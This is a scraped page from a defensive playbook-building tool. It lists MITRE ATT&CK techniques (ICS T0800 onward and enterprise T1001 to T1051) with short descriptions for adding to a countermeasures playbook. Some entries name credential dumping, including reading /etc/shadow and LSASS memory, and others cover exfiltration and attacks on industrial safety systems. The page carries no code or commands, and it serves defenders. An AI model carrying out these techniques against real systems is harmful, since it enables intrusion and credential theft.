1. Add ATT&CK Techniquesnot completed
  2. Add Additional Countermeasuresnot completed
  3. Review Playbooknot completed

Step 1 of 3 Add ATT&CK Techniques

Add ATT&CK Techniques

What has the adversary done? Add observed ATT&CK Techniques to your Playbook

Add Techniques from Text

Locate Techniques by pasting text that contains IDs

Example: T1595.001

Located IDs

Already in Cart:

Add to Playbook:

Search for Techniques

1081 Techniques

Activate Firmware Update Mode (T0800)

View on ATT&CK

Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction.

More Info

In Playbook

Monitor Process State (T0801)

View on ATT&CK

Adversaries may gather information about the physical process state.

More Info

In Playbook

Automated Collection (T0802)

View on ATT&CK

Adversaries may automate collection of industrial environment information using tools or scripts.

More Info

In Playbook

Block Command Message (T0803)

View on ATT&CK

Adversaries may block a command message from reaching its intended target to prevent command execution.

More Info

In Playbook

Block Reporting Message (T0804)

View on ATT&CK

Adversaries may block or prevent a reporting message from reaching its intended target.

More Info

In Playbook

Block Serial COM (T0805)

View on ATT&CK

Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices.

More Info

In Playbook

Brute Force I/O (T0806)

View on ATT&CK

Adversaries may repetitively or successively change I/O point values to perform an action.

More Info

In Playbook

Command-Line Interface (T0807)

View on ATT&CK

Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands.

More Info

In Playbook

Control Device Identification (T0808)

View on ATT&CK

Adversaries may perform control device identification to determine the make and model of a target device.

More Info

In Playbook

Data Destruction (T0809)

View on ATT&CK

Adversaries may perform data destruction over the course of an operation.

More Info

In Playbook

Data Historian Compromise (T0810)

View on ATT&CK

Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment.

More Info

In Playbook

Data from Information Repositories (T0811)

View on ATT&CK

Adversaries may target and collect data from information repositories.

More Info

In Playbook

Default Credentials (T0812)

View on ATT&CK

Adversaries may leverage manufacturer or supplier set default credentials on control system devices.

More Info

In Playbook

Denial of Control (T0813)

View on ATT&CK

Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls.

More Info

In Playbook

Denial of Service (T0814)

View on ATT&CK

Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality.

More Info

In Playbook

Denial of View (T0815)

View on ATT&CK

Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment.

More Info

In Playbook

Device Restart/Shutdown (T0816)

View on ATT&CK

Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes.

More Info

In Playbook

Drive-by Compromise (T0817)

View on ATT&CK

Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session.

More Info

In Playbook

Engineering Workstation Compromise (T0818)

View on ATT&CK

Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment.

More Info

In Playbook

Exploit Public-Facing Application (T0819)

View on ATT&CK

Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network.

More Info

In Playbook

Exploitation for Evasion (T0820)

View on ATT&CK

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection.

More Info

In Playbook

Modify Controller Tasking (T0821)

View on ATT&CK

Adversaries may modify the tasking of a controller to allow for the execution of their own programs.

More Info

In Playbook

External Remote Services (T0822)

View on ATT&CK

Adversaries may leverage external remote services as a point of initial access into your network.

More Info

In Playbook

Graphical User Interface (T0823)

View on ATT&CK

Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities.

More Info

In Playbook

I/O Module Discovery (T0824)

View on ATT&CK

Adversaries may use input/output (I/O) module discovery to gather key information about a control system device.

More Info

In Playbook

Location Identification (T0825)

View on ATT&CK

Adversaries may perform location identification using device data to inform operations and targeted impact for attacks.

More Info

In Playbook

Loss of Availability (T0826)

View on ATT&CK

Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services.

More Info

In Playbook

Loss of Control (T0827)

View on ATT&CK

Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided.

More Info

In Playbook

Loss of Productivity and Revenue (T0828)

View on ATT&CK

Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes.

More Info

In Playbook

Loss of View (T0829)

View on ATT&CK

Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation.

More Info

In Playbook

Adversary-in-the-Middle (T0830)

View on ATT&CK

Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks.

More Info

In Playbook

Manipulation of Control (T0831)

View on ATT&CK

Adversaries may manipulate physical process control within the industrial environment.

More Info

In Playbook

Manipulation of View (T0832)

View on ATT&CK

Adversaries may attempt to manipulate the information reported back to operators or controllers.

More Info

In Playbook

Modify Control Logic (T0833)

View on ATT&CK

Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic.

More Info

In Playbook

Native API (T0834)

View on ATT&CK

Adversaries may directly interact with the native OS application programming interface (API) to access system functions.

More Info

In Playbook

Manipulate I/O Image (T0835)

View on ATT&CK

Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected.

More Info

In Playbook

Modify Parameter (T0836)

View on ATT&CK

Adversaries may modify parameters used to instruct industrial control system devices.

More Info

In Playbook

Loss of Protection (T0837)

View on ATT&CK

Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions.

More Info

In Playbook

Modify Alarm Settings (T0838)

View on ATT&CK

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios.

More Info

In Playbook

Module Firmware (T0839)

View on ATT&CK

Adversaries may install malicious or vulnerable firmware onto modular hardware devices.

More Info

In Playbook

Network Connection Enumeration (T0840)

View on ATT&CK

Adversaries may perform network connection enumeration to discover information about device communication patterns.

More Info

In Playbook

Network Service Scanning (T0841)

View on ATT&CK

Network Service Scanning is the process of discovering services on networked systems.

More Info

In Playbook

Network Sniffing (T0842)

View on ATT&CK

Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information.

More Info

In Playbook

Program Download (T0843)

View on ATT&CK

Adversaries may perform a program download to transfer a user program to a controller.

More Info

In Playbook

Program Organization Units (T0844)

View on ATT&CK

Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects.

More Info

In Playbook

Program Upload (T0845)

View on ATT&CK

Adversaries may attempt to upload a program from a PLC to gather information about an industrial process.

More Info

In Playbook

Remote System Discovery (T0846)

View on ATT&CK

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques.

More Info

In Playbook

Replication Through Removable Media (T0847)

View on ATT&CK

Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment.

More Info

In Playbook

Rogue Master (T0848)

View on ATT&CK

Adversaries may setup a rogue master to leverage control server functions to communicate with outstations.

More Info

In Playbook

Masquerading (T0849)

View on ATT&CK

Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion.

More Info

In Playbook

Role Identification (T0850)

View on ATT&CK

Adversaries may perform role identification of devices involved with physical processes of interest in a target control system.

More Info

In Playbook

Rootkit (T0851)

View on ATT&CK

Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.

More Info

In Playbook

Screen Capture (T0852)

View on ATT&CK

Adversaries may attempt to perform screen capture of devices in the control system environment.

More Info

In Playbook

Scripting (T0853)

View on ATT&CK

Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter.

More Info

In Playbook

Serial Connection Enumeration (T0854)

View on ATT&CK

Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network.

More Info

In Playbook

Unauthorized Command Message (T0855)

View on ATT&CK

Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function.

More Info

In Playbook

Spoof Reporting Message (T0856)

View on ATT&CK

Adversaries may spoof reporting messages in control system environments for evasion and to impair process control.

More Info

In Playbook

System Firmware (T0857)

View on ATT&CK

System firmware on modern assets is often designed with an update feature.

More Info

In Playbook

Change Operating Mode (T0858)

View on ATT&CK

Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download.

More Info

In Playbook

Valid Accounts (T0859)

View on ATT&CK

Adversaries may steal the credentials of a specific user or service account using credential access techniques.

More Info

In Playbook

Wireless Compromise (T0860)

View on ATT&CK

Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network.

More Info

In Playbook

Point & Tag Identification (T0861)

View on ATT&CK

Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment.

More Info

In Playbook

Supply Chain Compromise (T0862)

View on ATT&CK

Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows.

More Info

In Playbook

User Execution (T0863)

View on ATT&CK

Adversaries may rely on a targeted organizations user interaction for the execution of malicious code.

More Info

In Playbook

Transient Cyber Asset (T0864)

View on ATT&CK

Adversaries may target devices that are transient across ICS networks and external networks.

More Info

In Playbook

Spearphishing Attachment (T0865)

View on ATT&CK

Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets.

More Info

In Playbook

Exploitation of Remote Services (T0866)

View on ATT&CK

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse.

More Info

In Playbook

Lateral Tool Transfer (T0867)

View on ATT&CK

Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation.

More Info

In Playbook

Detect Operating Mode (T0868)

View on ATT&CK

Adversaries may gather information about a PLCs or controllers current operating mode.

More Info

In Playbook

Standard Application Layer Protocol (T0869)

View on ATT&CK

Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus.

More Info

In Playbook

Detect Program State (T0870)

View on ATT&CK

Adversaries may seek to gather information about the current state of a program on a PLC.

More Info

In Playbook

Execution through API (T0871)

View on ATT&CK

Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware.

More Info

In Playbook

Indicator Removal on Host (T0872)

View on ATT&CK

Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks.

More Info

In Playbook

Project File Infection (T0873)

View on ATT&CK

Adversaries may attempt to infect project files with malicious code.

More Info

In Playbook

Hooking (T0874)

View on ATT&CK

Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means.

More Info

In Playbook

Change Program State (T0875)

View on ATT&CK

Adversaries may attempt to change the state of the current program on a control device.

More Info

In Playbook

I/O Image (T0877)

View on ATT&CK

Adversaries may seek to capture process values related to the inputs and outputs of a PLC.

More Info

In Playbook

Alarm Suppression (T0878)

View on ATT&CK

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions.

More Info

In Playbook

Damage to Property (T0879)

View on ATT&CK

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems.

More Info

In Playbook

Loss of Safety (T0880)

View on ATT&CK

Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur.

More Info

In Playbook

Service Stop (T0881)

View on ATT&CK

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.

More Info

In Playbook

Theft of Operational Information (T0882)

View on ATT&CK

Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations.

More Info

In Playbook

Internet Accessible Device (T0883)

View on ATT&CK

Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.

More Info

In Playbook

Connection Proxy (T0884)

View on ATT&CK

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.

More Info

In Playbook

Commonly Used Port (T0885)

View on ATT&CK

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection.

More Info

In Playbook

Remote Services (T0886)

View on ATT&CK

Adversaries may leverage remote services to move between assets and network segments.

More Info

In Playbook

Wireless Sniffing (T0887)

View on ATT&CK

Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments.

More Info

In Playbook

Remote System Information Discovery (T0888)

View on ATT&CK

An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration.

More Info

In Playbook

Modify Program (T0889)

View on ATT&CK

Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network.

More Info

In Playbook

Exploitation for Privilege Escalation (T0890)

View on ATT&CK

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.

More Info

In Playbook

Hardcoded Credentials (T0891)

View on ATT&CK

Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset.

More Info

In Playbook

Change Credential (T0892)

View on ATT&CK

Adversaries may modify software and device credentials to prevent operator and responder access.

More Info

In Playbook

Data from Local System (T0893)

View on ATT&CK

Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases.

More Info

In Playbook

System Binary Proxy Execution (T0894)

View on ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

More Info

In Playbook

Autorun Image (T0895)

View on ATT&CK

Adversaries may leverage AutoRun functionality or scripts to execute malicious code.

More Info

In Playbook

Data Obfuscation (T1001)

View on ATT&CK

Adversaries may obfuscate command and control traffic to make it more difficult to detect.

More Info

In Playbook
Data Obfuscation

Junk Data (T1001.001)

View on ATT&CK

Adversaries may add junk data to protocols used for command and control to make detection more difficult.

More Info

In Playbook
Data Obfuscation

Steganography (T1001.002)

View on ATT&CK

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult.

More Info

In Playbook
Data Obfuscation

Protocol or Service Impersonation (T1001.003)

View on ATT&CK

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts.

More Info

In Playbook

Data Compressed (T1002)

View on ATT&CK

An adversary may compress data (e.

More Info

In Playbook

OS Credential Dumping (T1003)

View on ATT&CK

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password.

More Info

In Playbook
OS Credential Dumping

LSASS Memory (T1003.001)

View on ATT&CK

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).

More Info

In Playbook
OS Credential Dumping

Security Account Manager (T1003.002)

View on ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.

More Info

In Playbook
OS Credential Dumping

NTDS (T1003.003)

View on ATT&CK

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.

More Info

In Playbook
OS Credential Dumping

LSA Secrets (T1003.004)

View on ATT&CK

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.

More Info

In Playbook
OS Credential Dumping

Cached Domain Credentials (T1003.005)

View on ATT&CK

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.

More Info

In Playbook
OS Credential Dumping

DCSync (T1003.006)

View on ATT&CK

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.

More Info

In Playbook
OS Credential Dumping

Proc Filesystem (T1003.007)

View on ATT&CK

Adversaries may gather credentials from the proc filesystem or `/proc`.

More Info

In Playbook
OS Credential Dumping

/etc/passwd and /etc/shadow (T1003.008)

View on ATT&CK

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking.

More Info

In Playbook

Winlogon Helper DLL (T1004)

View on ATT&CK

Winlogon.

More Info

In Playbook

Data from Local System (T1005)

View on ATT&CK

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

More Info

In Playbook

Direct Volume Access (T1006)

View on ATT&CK

Adversaries may directly access a volume to bypass file access controls and file system monitoring.

More Info

In Playbook

System Service Discovery (T1007)

View on ATT&CK

Adversaries may try to gather information about registered local system services.

More Info

In Playbook

Fallback Channels (T1008)

View on ATT&CK

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

More Info

In Playbook

Binary Padding (T1009)

View on ATT&CK

Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary.

More Info

In Playbook

Application Window Discovery (T1010)

View on ATT&CK

Adversaries may attempt to get a listing of open application windows.

More Info

In Playbook

Exfiltration Over Other Network Medium (T1011)

View on ATT&CK

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel.

More Info

In Playbook
Exfiltration Over Other Network Medium

Exfiltration Over Bluetooth (T1011.001)

View on ATT&CK

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel.

More Info

In Playbook

Query Registry (T1012)

View on ATT&CK

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

More Info

In Playbook

Port Monitors (T1013)

View on ATT&CK

A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup.

More Info

In Playbook

Rootkit (T1014)

View on ATT&CK

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.

More Info

In Playbook

Accessibility Features (T1015)

View on ATT&CK

Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen).

More Info

In Playbook

System Network Configuration Discovery (T1016)

View on ATT&CK

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems.

More Info

In Playbook
System Network Configuration Discovery

Internet Connection Discovery (T1016.001)

View on ATT&CK

Adversaries may check for Internet connectivity on compromised systems.

More Info

In Playbook
System Network Configuration Discovery

Wi-Fi Discovery (T1016.002)

View on ATT&CK

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

More Info

In Playbook

Application Deployment Software (T1017)

View on ATT&CK

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators.

More Info

In Playbook

Remote System Discovery (T1018)

View on ATT&CK

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

More Info

In Playbook

System Firmware (T1019)

View on ATT&CK

The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.

More Info

In Playbook

Automated Exfiltration (T1020)

View on ATT&CK

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

More Info

In Playbook
Automated Exfiltration

Traffic Duplication (T1020.001)

View on ATT&CK

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure.

More Info

In Playbook

Remote Services (T1021)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Remote Desktop Protocol (T1021.001)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

SMB/Windows Admin Shares (T1021.002)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Distributed Component Object Model (T1021.003)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

SSH (T1021.004)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

VNC (T1021.005)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Windows Remote Management (T1021.006)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Cloud Services (T1021.007)

View on ATT&CK

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Direct Cloud VM Connections (T1021.008)

View on ATT&CK

Adversaries may leverage [Valid Accounts](https://attack.

More Info

In Playbook

Data Encrypted (T1022)

View on ATT&CK

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender.

More Info

In Playbook

Shortcut Modification (T1023)

View on ATT&CK

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

More Info

In Playbook

Custom Cryptographic Protocol (T1024)

View on ATT&CK

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic.

More Info

In Playbook

Data from Removable Media (T1025)

View on ATT&CK

Adversaries may search connected removable media on computers they have compromised to find files of interest.

More Info

In Playbook

Multiband Communication (T1026)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

Obfuscated Files or Information (T1027)

View on ATT&CK

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

More Info

In Playbook
Obfuscated Files or Information

Binary Padding (T1027.001)

View on ATT&CK

Adversaries may use binary padding to add junk data and change the on-disk representation of malware.

More Info

In Playbook
Obfuscated Files or Information

Software Packing (T1027.002)

View on ATT&CK

Adversaries may perform software packing or virtual machine software protection to conceal their code.

More Info

In Playbook
Obfuscated Files or Information

Steganography (T1027.003)

View on ATT&CK

Adversaries may use steganography techniques in order to prevent the detection of hidden information.

More Info

In Playbook
Obfuscated Files or Information

Compile After Delivery (T1027.004)

View on ATT&CK

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code.

More Info

In Playbook
Obfuscated Files or Information

Indicator Removal from Tools (T1027.005)

View on ATT&CK

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed.

More Info

In Playbook
Obfuscated Files or Information

HTML Smuggling (T1027.006)

View on ATT&CK

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.

More Info

In Playbook
Obfuscated Files or Information

Dynamic API Resolution (T1027.007)

View on ATT&CK

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis.

More Info

In Playbook
Obfuscated Files or Information

Stripped Payloads (T1027.008)

View on ATT&CK

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information.

More Info

In Playbook
Obfuscated Files or Information

Embedded Payloads (T1027.009)

View on ATT&CK

Adversaries may embed payloads within other files to conceal malicious content from defenses.

More Info

In Playbook
Obfuscated Files or Information

Command Obfuscation (T1027.010)

View on ATT&CK

Adversaries may obfuscate content during command execution to impede detection.

More Info

In Playbook
Obfuscated Files or Information

Fileless Storage (T1027.011)

View on ATT&CK

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses.

More Info

In Playbook
Obfuscated Files or Information

LNK Icon Smuggling (T1027.012)

View on ATT&CK

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files.

More Info

In Playbook
Obfuscated Files or Information

Encrypted/Encoded File (T1027.013)

View on ATT&CK

Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection.

More Info

In Playbook
Obfuscated Files or Information

Polymorphic Code (T1027.014)

View on ATT&CK

Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection.

More Info

In Playbook

Windows Remote Management (T1028)

View on ATT&CK

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.

More Info

In Playbook

Scheduled Transfer (T1029)

View on ATT&CK

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals.

More Info

In Playbook

Data Transfer Size Limits (T1030)

View on ATT&CK

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.

More Info

In Playbook

Modify Existing Service (T1031)

View on ATT&CK

Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry.

More Info

In Playbook

Standard Cryptographic Protocol (T1032)

View on ATT&CK

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook

System Owner/User Discovery (T1033)

View on ATT&CK

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.

More Info

In Playbook

Path Interception (T1034)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Service Execution (T1035)

View on ATT&CK

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager.

More Info

In Playbook

Masquerading (T1036)

View on ATT&CK

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

More Info

In Playbook
Masquerading

Invalid Code Signature (T1036.001)

View on ATT&CK

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool.

More Info

In Playbook
Masquerading

Right-to-Left Override (T1036.002)

View on ATT&CK

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign.

More Info

In Playbook
Masquerading

Rename System Utilities (T1036.003)

View on ATT&CK

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.

More Info

In Playbook
Masquerading

Masquerade Task or Service (T1036.004)

View on ATT&CK

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.

More Info

In Playbook
Masquerading

Match Legitimate Name or Location (T1036.005)

View on ATT&CK

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.

More Info

In Playbook
Masquerading

Space after Filename (T1036.006)

View on ATT&CK

Adversaries can hide a program's true filetype by changing the extension of a file.

More Info

In Playbook
Masquerading

Double File Extension (T1036.007)

View on ATT&CK

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type.

More Info

In Playbook
Masquerading

Masquerade File Type (T1036.008)

View on ATT&CK

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents.

More Info

In Playbook
Masquerading

Break Process Trees (T1036.009)

View on ATT&CK

An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID).

More Info

In Playbook
Masquerading

Masquerade Account Name (T1036.010)

View on ATT&CK

Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign.

More Info

In Playbook

Boot or Logon Initialization Scripts (T1037)

View on ATT&CK

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.

More Info

In Playbook
Boot or Logon Initialization Scripts

Logon Script (Windows) (T1037.001)

View on ATT&CK

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence.

More Info

In Playbook
Boot or Logon Initialization Scripts

Login Hook (T1037.002)

View on ATT&CK

Adversaries may use a Login Hook to establish persistence executed upon user logon.

More Info

In Playbook
Boot or Logon Initialization Scripts

Network Logon Script (T1037.003)

View on ATT&CK

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence.

More Info

In Playbook
Boot or Logon Initialization Scripts

RC Scripts (T1037.004)

View on ATT&CK

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup.

More Info

In Playbook
Boot or Logon Initialization Scripts

Startup Items (T1037.005)

View on ATT&CK

Adversaries may use startup items automatically executed at boot initialization to establish persistence.

More Info

In Playbook

DLL Search Order Hijacking (T1038)

View on ATT&CK

Windows systems use a common method to look for required DLLs to load into a program.

More Info

In Playbook

Data from Network Shared Drive (T1039)

View on ATT&CK

Adversaries may search network shares on computers they have compromised to find files of interest.

More Info

In Playbook

Network Sniffing (T1040)

View on ATT&CK

Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network.

More Info

In Playbook

Exfiltration Over C2 Channel (T1041)

View on ATT&CK

Adversaries may steal data by exfiltrating it over an existing command and control channel.

More Info

In Playbook

Change Default File Association (T1042)

View on ATT&CK

When a file is opened, the default program used to open the file (also called the file association or handler) is checked.

More Info

In Playbook

Commonly Used Port (T1043)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

File System Permissions Weakness (T1044)

View on ATT&CK

Processes may automatically execute specific binaries as part of their functionality or to perform other actions.

More Info

In Playbook

Software Packing (T1045)

View on ATT&CK

Software packing is a method of compressing or encrypting an executable.

More Info

In Playbook

Network Service Discovery (T1046)

View on ATT&CK

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.

More Info

In Playbook

Windows Management Instrumentation (T1047)

View on ATT&CK

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads.

More Info

In Playbook

Exfiltration Over Alternative Protocol (T1048)

View on ATT&CK

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

More Info

In Playbook
Exfiltration Over Alternative Protocol

Exfiltration Over Symmetric Encrypted Non-C2 Protocol (T1048.001)

View on ATT&CK

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

More Info

In Playbook
Exfiltration Over Alternative Protocol

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)

View on ATT&CK

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.

More Info

In Playbook
Exfiltration Over Alternative Protocol

Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)

View on ATT&CK

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

More Info

In Playbook

System Network Connections Discovery (T1049)

View on ATT&CK

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

More Info

In Playbook

New Service (T1050)

View on ATT&CK

When operating systems boot up, they can start programs or applications called services that perform background system functions.

More Info

In Playbook

Shared Webroot (T1051)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

